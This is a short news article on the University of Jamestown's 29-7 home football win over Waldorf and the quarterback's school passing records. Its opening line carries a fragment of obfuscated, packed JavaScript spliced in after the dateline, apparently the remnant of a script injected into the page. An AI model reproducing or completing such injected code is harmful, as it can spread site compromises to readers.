JAMESTOWN eizyb|var|u0026u|referrer|ahaza||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – It was the final home football game for 19 Jimmie seniors at Taylor Stadium and they used that early emotion to take care of Waldorf 29-7. Jamestown dominated the first 30 minutes scoring 27-straight points and holding the Warriors to just 39 yards in the first half.
Beau Eriksson finished rewriting the Jimmie football passing records with his first of two touchdown tosses in the opening quarter. He hit Charlie Heck out of the backfield for a nine-yarder and later hooked up with JaRiquez Collier for a 50-yard score. Eriksson’s first to Heck was career touchdown pass number 52, passing Josh Otteson for the most in school history. He now owns all the major passing records in UJ history.
The Jimmie defense forced six punts in seven possessions in the first half. The only time Waldorf didn’t punt was when the half expired.
Waldorf scored on the opening drive of the third for their only score of the day. Cam White would tally the final scoring play for the Jimmies when he snuffed out a reverse for a safety in the third quarter.
Jamestown will finish off their season on Sunday, November 8th at the Fargodome against either Mayville State or Dakota State. Time is to be announced.
